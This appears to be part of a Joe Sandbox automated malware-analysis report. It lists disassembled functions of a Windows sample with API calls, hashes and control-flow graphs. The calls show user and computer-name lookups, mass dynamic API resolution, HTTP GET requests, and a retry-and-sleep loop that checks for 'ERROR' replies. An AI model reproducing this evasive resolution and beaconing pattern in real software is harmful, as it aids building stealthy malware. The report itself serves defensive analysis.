                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: f1cd486acb3c4e8cf3d0c83dc47072a8dcf2059b2a78fbae7a6c8bae1580de1c
                                        • Instruction ID: 1d4f021422acc558201640b65ac9af362d5419cdd88c718275919088b17814f4
                                        • Opcode Fuzzy Hash: f1cd486acb3c4e8cf3d0c83dc47072a8dcf2059b2a78fbae7a6c8bae1580de1c
                                        • Instruction Fuzzy Hash: A80181B1A04208EBD750DF98DD45FAEFBB8FB04B22F10421AFA55E3280C37459048BB1
                                        Function 00A57850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A411B7), ref: 00A57880
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A57887
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A5789F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: 72133e0f2f0b5336384c366ec1094b76867be5dfb40a8c4122fab703959b714f
                                        • Instruction ID: 17e3499240732c73b2be8090eddbbb9a47597e87117a2b84dfa8336044ae1860
                                        • Opcode Fuzzy Hash: 72133e0f2f0b5336384c366ec1094b76867be5dfb40a8c4122fab703959b714f
                                        • Instruction Fuzzy Hash: EAF04FB1944208ABD710DF98DD49BAEBBB8FB04711F10065AFA05A2680C77415448BA1
                                        Function 00A41160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: f8b9510de722942b4f1aa8f0f1a211eee9dc9e4198838dea20ef75173ffc89a4
                                        • Instruction ID: af879bd3a96e66a7e7026c8d42130bcb8feb6b965bd0f1ad1f048376de3c0963
                                        • Opcode Fuzzy Hash: f8b9510de722942b4f1aa8f0f1a211eee9dc9e4198838dea20ef75173ffc89a4
                                        • Instruction Fuzzy Hash: B8D05E7490030CDBDB00DFE0D8497DDBB78FB0C311F000659D90562340EA305481CBAA
                                        Function 00A59C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 633 a59c10-a59c1a 634 a5a036-a5a0ca LoadLibraryA * 8 633->634 635 a59c20-a5a031 GetProcAddress * 43 633->635 636 a5a146-a5a14d 634->636 637 a5a0cc-a5a141 GetProcAddress * 5 634->637 635->634 638 a5a216-a5a21d 636->638 639 a5a153-a5a211 GetProcAddress * 8 636->639 637->636 640 a5a21f-a5a293 GetProcAddress * 5 638->640 641 a5a298-a5a29f 638->641 639->638 640->641 642 a5a2a5-a5a332 GetProcAddress * 6 641->642 643 a5a337-a5a33e 641->643 642->643 644 a5a344-a5a41a GetProcAddress * 9 643->644 645 a5a41f-a5a426 643->645 644->645 646 a5a4a2-a5a4a9 645->646 647 a5a428-a5a49d GetProcAddress * 5 645->647 648 a5a4dc-a5a4e3 646->648 649 a5a4ab-a5a4d7 GetProcAddress * 2 646->649 647->646 650 a5a515-a5a51c 648->650 651 a5a4e5-a5a510 GetProcAddress * 2 648->651 649->648 652 a5a612-a5a619 650->652 653 a5a522-a5a60d GetProcAddress * 10 650->653 651->650 654 a5a67d-a5a684 652->654 655 a5a61b-a5a678 GetProcAddress * 4 652->655 653->652 656 a5a686-a5a699 GetProcAddress 654->656 657 a5a69e-a5a6a5 654->657 655->654 656->657 658 a5a6a7-a5a703 GetProcAddress * 4 657->658 659 a5a708-a5a709 657->659 658->659
                                        APIs
                                        • GetProcAddress.KERNEL32(75900000,015F67C0), ref: 00A59C2D
                                        • GetProcAddress.KERNEL32(75900000,015F6860), ref: 00A59C45
                                        • GetProcAddress.KERNEL32(75900000,016096C0), ref: 00A59C5E
                                        • GetProcAddress.KERNEL32(75900000,01609600), ref: 00A59C76
                                        • GetProcAddress.KERNEL32(75900000,0160D200), ref: 00A59C8E
                                        • GetProcAddress.KERNEL32(75900000,0160D1A0), ref: 00A59CA7
                                        • GetProcAddress.KERNEL32(75900000,015FBDE8), ref: 00A59CBF
                                        • GetProcAddress.KERNEL32(75900000,0160CF48), ref: 00A59CD7
                                        • GetProcAddress.KERNEL32(75900000,0160D1B8), ref: 00A59CF0
                                        • GetProcAddress.KERNEL32(75900000,0160D188), ref: 00A59D08
                                        • GetProcAddress.KERNEL32(75900000,0160D098), ref: 00A59D20
                                        • GetProcAddress.KERNEL32(75900000,015F69A0), ref: 00A59D39
                                        • GetProcAddress.KERNEL32(75900000,015F66A0), ref: 00A59D51
                                        • GetProcAddress.KERNEL32(75900000,015F69C0), ref: 00A59D69
                                        • GetProcAddress.KERNEL32(75900000,015F6880), ref: 00A59D82
                                        • GetProcAddress.KERNEL32(75900000,0160D1D0), ref: 00A59D9A
                                        • GetProcAddress.KERNEL32(75900000,0160CF90), ref: 00A59DB2
                                        • GetProcAddress.KERNEL32(75900000,015FBB90), ref: 00A59DCB
                                        • GetProcAddress.KERNEL32(75900000,015F66E0), ref: 00A59DE3
                                        • GetProcAddress.KERNEL32(75900000,0160D1E8), ref: 00A59DFB
                                        • GetProcAddress.KERNEL32(75900000,0160D038), ref: 00A59E14
                                        • GetProcAddress.KERNEL32(75900000,0160D140), ref: 00A59E2C
                                        • GetProcAddress.KERNEL32(75900000,0160D0B0), ref: 00A59E44
                                        • GetProcAddress.KERNEL32(75900000,015F68A0), ref: 00A59E5D
                                        • GetProcAddress.KERNEL32(75900000,0160CFC0), ref: 00A59E75
                                        • GetProcAddress.KERNEL32(75900000,0160CFA8), ref: 00A59E8D
                                        • GetProcAddress.KERNEL32(75900000,0160D0C8), ref: 00A59EA6
                                        • GetProcAddress.KERNEL32(75900000,0160D158), ref: 00A59EBE
                                        • GetProcAddress.KERNEL32(75900000,0160D0E0), ref: 00A59ED6
                                        • GetProcAddress.KERNEL32(75900000,0160D0F8), ref: 00A59EEF
                                        • GetProcAddress.KERNEL32(75900000,0160CF18), ref: 00A59F07
                                        • GetProcAddress.KERNEL32(75900000,0160CF30), ref: 00A59F1F
                                        • GetProcAddress.KERNEL32(75900000,0160D110), ref: 00A59F38
                                        • GetProcAddress.KERNEL32(75900000,0160A9F8), ref: 00A59F50
                                        • GetProcAddress.KERNEL32(75900000,0160CFD8), ref: 00A59F68
                                        • GetProcAddress.KERNEL32(75900000,0160CFF0), ref: 00A59F81
                                        • GetProcAddress.KERNEL32(75900000,015F6960), ref: 00A59F99
                                        • GetProcAddress.KERNEL32(75900000,0160CF60), ref: 00A59FB1
                                        • GetProcAddress.KERNEL32(75900000,015F6980), ref: 00A59FCA
                                        • GetProcAddress.KERNEL32(75900000,0160D020), ref: 00A59FE2
                                        • GetProcAddress.KERNEL32(75900000,0160D128), ref: 00A59FFA
                                        • GetProcAddress.KERNEL32(75900000,015F6460), ref: 00A5A013
                                        • GetProcAddress.KERNEL32(75900000,015F6280), ref: 00A5A02B
                                        • LoadLibraryA.KERNEL32(0160D170,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A03D
                                        • LoadLibraryA.KERNEL32(0160D008,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A04E
                                        • LoadLibraryA.KERNEL32(0160CF78,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A060
                                        • LoadLibraryA.KERNEL32(0160D050,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A072
                                        • LoadLibraryA.KERNEL32(0160D068,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A083
                                        • LoadLibraryA.KERNEL32(0160D080,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A095
                                        • LoadLibraryA.KERNEL32(0160D2C0,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A0A7
                                        • LoadLibraryA.KERNEL32(0160D2A8,?,00A55CA3,00A60AEB,?,?,?,?,?,?,?,?,?,?,00A60AEA,00A60AE3), ref: 00A5A0B8
                                        • GetProcAddress.KERNEL32(75FD0000,015F6440), ref: 00A5A0DA
                                        • GetProcAddress.KERNEL32(75FD0000,0160D3E0), ref: 00A5A0F2
                                        • GetProcAddress.KERNEL32(75FD0000,01608F58), ref: 00A5A10A
                                        • GetProcAddress.KERNEL32(75FD0000,0160D230), ref: 00A5A123
                                        • GetProcAddress.KERNEL32(75FD0000,015F6380), ref: 00A5A13B
                                        • GetProcAddress.KERNEL32(734B0000,015FB6B8), ref: 00A5A160
                                        • GetProcAddress.KERNEL32(734B0000,015F64C0), ref: 00A5A179
                                        • GetProcAddress.KERNEL32(734B0000,015FBA00), ref: 00A5A191
                                        • GetProcAddress.KERNEL32(734B0000,0160D248), ref: 00A5A1A9
                                        • GetProcAddress.KERNEL32(734B0000,0160D308), ref: 00A5A1C2
                                        • GetProcAddress.KERNEL32(734B0000,015F6320), ref: 00A5A1DA
                                        • GetProcAddress.KERNEL32(734B0000,015F62C0), ref: 00A5A1F2
                                        • GetProcAddress.KERNEL32(734B0000,0160D2D8), ref: 00A5A20B
                                        • GetProcAddress.KERNEL32(763B0000,015F6540), ref: 00A5A22C
                                        • GetProcAddress.KERNEL32(763B0000,015F64E0), ref: 00A5A244
                                        • GetProcAddress.KERNEL32(763B0000,0160D4B8), ref: 00A5A25D
                                        • GetProcAddress.KERNEL32(763B0000,0160D2F0), ref: 00A5A275
                                        • GetProcAddress.KERNEL32(763B0000,015F62E0), ref: 00A5A28D
                                        • GetProcAddress.KERNEL32(750F0000,015FB9B0), ref: 00A5A2B3
                                        • GetProcAddress.KERNEL32(750F0000,015FB708), ref: 00A5A2CB
                                        • GetProcAddress.KERNEL32(750F0000,0160D488), ref: 00A5A2E3
                                        • GetProcAddress.KERNEL32(750F0000,015F64A0), ref: 00A5A2FC
                                        • GetProcAddress.KERNEL32(750F0000,015F65E0), ref: 00A5A314
                                        • GetProcAddress.KERNEL32(750F0000,015FB758), ref: 00A5A32C
                                        • GetProcAddress.KERNEL32(75A50000,0160D320), ref: 00A5A352
                                        • GetProcAddress.KERNEL32(75A50000,015F6340), ref: 00A5A36A
                                        • GetProcAddress.KERNEL32(75A50000,01608F28), ref: 00A5A382
                                        • GetProcAddress.KERNEL32(75A50000,0160D3F8), ref: 00A5A39B
                                        • GetProcAddress.KERNEL32(75A50000,0160D260), ref: 00A5A3B3
                                        • GetProcAddress.KERNEL32(75A50000,015F6600), ref: 00A5A3CB
                                        • GetProcAddress.KERNEL32(75A50000,015F6640), ref: 00A5A3E4
                                        • GetProcAddress.KERNEL32(75A50000,0160D4A0), ref: 00A5A3FC
                                        • GetProcAddress.KERNEL32(75A50000,0160D440), ref: 00A5A414
                                        • GetProcAddress.KERNEL32(75070000,015F6620), ref: 00A5A436
                                        • GetProcAddress.KERNEL32(75070000,0160D338), ref: 00A5A44E
                                        • GetProcAddress.KERNEL32(75070000,0160D278), ref: 00A5A466
                                        • GetProcAddress.KERNEL32(75070000,0160D4D0), ref: 00A5A47F
                                        • GetProcAddress.KERNEL32(75070000,0160D350), ref: 00A5A497
                                        • GetProcAddress.KERNEL32(74E50000,015F65C0), ref: 00A5A4B8
                                        • GetProcAddress.KERNEL32(74E50000,015F6580), ref: 00A5A4D1
                                        • GetProcAddress.KERNEL32(75320000,015F6660), ref: 00A5A4F2
                                        • GetProcAddress.KERNEL32(75320000,0160D4E8), ref: 00A5A50A
                                        • GetProcAddress.KERNEL32(6F060000,015F6300), ref: 00A5A530
                                        • GetProcAddress.KERNEL32(6F060000,015F6360), ref: 00A5A548
                                        • GetProcAddress.KERNEL32(6F060000,015F6480), ref: 00A5A560
                                        • GetProcAddress.KERNEL32(6F060000,0160D368), ref: 00A5A579
                                        • GetProcAddress.KERNEL32(6F060000,015F63A0), ref: 00A5A591
                                        • GetProcAddress.KERNEL32(6F060000,015F6500), ref: 00A5A5A9
                                        • GetProcAddress.KERNEL32(6F060000,015F62A0), ref: 00A5A5C2
                                        • GetProcAddress.KERNEL32(6F060000,015F63C0), ref: 00A5A5DA
                                        • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00A5A5F1
                                        • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00A5A607
                                        • GetProcAddress.KERNEL32(74E00000,0160D500), ref: 00A5A629
                                        • GetProcAddress.KERNEL32(74E00000,01608FA8), ref: 00A5A641
                                        • GetProcAddress.KERNEL32(74E00000,0160D218), ref: 00A5A659
                                        • GetProcAddress.KERNEL32(74E00000,0160D410), ref: 00A5A672
                                        • GetProcAddress.KERNEL32(74DF0000,015F6520), ref: 00A5A693
                                        • GetProcAddress.KERNEL32(6E570000,0160D3C8), ref: 00A5A6B4
                                        • GetProcAddress.KERNEL32(6E570000,015F6560), ref: 00A5A6CD
                                        • GetProcAddress.KERNEL32(6E570000,0160D380), ref: 00A5A6E5
                                        • GetProcAddress.KERNEL32(6E570000,0160D290), ref: 00A5A6FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: bc56ec5eeeaa024028a47dffea6c15eefec9af378a0cca43abb963f8bdbfe2c9
                                        • Instruction ID: 8730e8ea406bf6f037033e343c6e737b7bd3ac61dfca26bd78424d663a9f8bf7
                                        • Opcode Fuzzy Hash: bc56ec5eeeaa024028a47dffea6c15eefec9af378a0cca43abb963f8bdbfe2c9
                                        • Instruction Fuzzy Hash: 7C621BB5610200AFF744DFA8ED88B5E37F9F78C701714851BA609C3274D739A852EB6A
                                        Function 00A46280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1033 a46280-a4630b call a5a7a0 call a447b0 call a5a740 InternetOpenA StrCmpCA 1040 a46314-a46318 1033->1040 1041 a4630d 1033->1041 1042 a4631e-a46342 InternetConnectA 1040->1042 1043 a46509-a46525 call a5a7a0 call a5a800 * 2 1040->1043 1041->1040 1045 a464ff-a46503 InternetCloseHandle 1042->1045 1046 a46348-a4634c 1042->1046 1062 a46528-a4652d 1043->1062 1045->1043 1048 a4634e-a46358 1046->1048 1049 a4635a 1046->1049 1051 a46364-a46392 HttpOpenRequestA 1048->1051 1049->1051 1053 a464f5-a464f9 InternetCloseHandle 1051->1053 1054 a46398-a4639c 1051->1054 1053->1045 1056 a463c5-a46405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 a4639e-a463bf InternetSetOptionA 1054->1057 1058 a46407-a46427 call a5a740 call a5a800 * 2 1056->1058 1059 a4642c-a4644b call a58940 1056->1059 1057->1056 1058->1062 1067 a4644d-a46454 1059->1067 1068 a464c9-a464e9 call a5a740 call a5a800 * 2 1059->1068 1071 a46456-a46480 InternetReadFile 1067->1071 1072 a464c7-a464ef InternetCloseHandle 1067->1072 1068->1062 1076 a46482-a46489 1071->1076 1077 a4648b 1071->1077 1072->1053 1076->1077 1080 a4648d-a464c5 call a5a9b0 call a5a8a0 call a5a800 1076->1080 1077->1072 1080->1071
                                        APIs
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A44839
                                          • Part of subcall function 00A447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A44849
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • InternetOpenA.WININET(00A60DFE,00000001,00000000,00000000,00000000), ref: 00A462E1
                                        • StrCmpCA.SHLWAPI(?,0160E9B0), ref: 00A46303
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A46335
                                        • HttpOpenRequestA.WININET(00000000,GET,?,0160E578,00000000,00000000,00400100,00000000), ref: 00A46385
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A463BF
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A463D1
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00A463FD
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A4646D
                                        • InternetCloseHandle.WININET(00000000), ref: 00A464EF
                                        • InternetCloseHandle.WININET(00000000), ref: 00A464F9
                                        • InternetCloseHandle.WININET(00000000), ref: 00A46503
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: 47dae3a8998cb30f52664f75173e23284c733eb3886b119bbaf0d78532229872
                                        • Instruction ID: 954440243653cbc4111a06842feab4e770ec6a95267ed75bd36712ef76b1a65e
                                        • Opcode Fuzzy Hash: 47dae3a8998cb30f52664f75173e23284c733eb3886b119bbaf0d78532229872
                                        • Instruction Fuzzy Hash: 98714E75A00218EBEF24DFA0CD49BEE7774BB45701F108199F509AB1D0DBB46A89CF52
                                        Function 00A55510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1090 a55510-a55577 call a55ad0 call a5a820 * 3 call a5a740 * 4 1106 a5557c-a55583 1090->1106 1107 a55585-a555b6 call a5a820 call a5a7a0 call a41590 call a551f0 1106->1107 1108 a555d7-a5564c call a5a740 * 2 call a41590 call a552c0 call a5a8a0 call a5a800 call a5aad0 StrCmpCA 1106->1108 1124 a555bb-a555d2 call a5a8a0 call a5a800 1107->1124 1134 a55693-a556a9 call a5aad0 StrCmpCA 1108->1134 1138 a5564e-a5568e call a5a7a0 call a41590 call a551f0 call a5a8a0 call a5a800 1108->1138 1124->1134 1139 a557dc-a55844 call a5a8a0 call a5a820 * 2 call a41670 call a5a800 * 4 call a56560 call a41550 1134->1139 1140 a556af-a556b6 1134->1140 1138->1134 1270 a55ac3-a55ac6 1139->1270 1143 a556bc-a556c3 1140->1143 1144 a557da-a5585f call a5aad0 StrCmpCA 1140->1144 1148 a556c5-a55719 call a5a820 call a5a7a0 call a41590 call a551f0 call a5a8a0 call a5a800 1143->1148 1149 a5571e-a55793 call a5a740 * 2 call a41590 call a552c0 call a5a8a0 call a5a800 call a5aad0 StrCmpCA 1143->1149 1163 a55865-a5586c 1144->1163 1164 a55991-a559f9 call a5a8a0 call a5a820 * 2 call a41670 call a5a800 * 4 call a56560 call a41550 1144->1164 1148->1144 1149->1144 1249 a55795-a557d5 call a5a7a0 call a41590 call a551f0 call a5a8a0 call a5a800 1149->1249 1170 a55872-a55879 1163->1170 1171 a5598f-a55a14 call a5aad0 StrCmpCA 1163->1171 1164->1270 1178 a558d3-a55948 call a5a740 * 2 call a41590 call a552c0 call a5a8a0 call a5a800 call a5aad0 StrCmpCA 1170->1178 1179 a5587b-a558ce call a5a820 call a5a7a0 call a41590 call a551f0 call a5a8a0 call a5a800 1170->1179 1199 a55a16-a55a21 Sleep 1171->1199 1200 a55a28-a55a91 call a5a8a0 call a5a820 * 2 call a41670 call a5a800 * 4 call a56560 call a41550 1171->1200 1178->1171 1275 a5594a-a5598a call a5a7a0 call a41590 call a551f0 call a5a8a0 call a5a800 1178->1275 1179->1171 1199->1106 1200->1270 1249->1144 1275->1171
                                        APIs
                                          • Part of subcall function 00A5A820: lstrlen.KERNEL32(00A44F05,?,?,00A44F05,00A60DDE), ref: 00A5A82B
                                          • Part of subcall function 00A5A820: lstrcpy.KERNEL32(00A60DDE,00000000), ref: 00A5A885
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A55644
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A556A1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A55857
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A55228
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
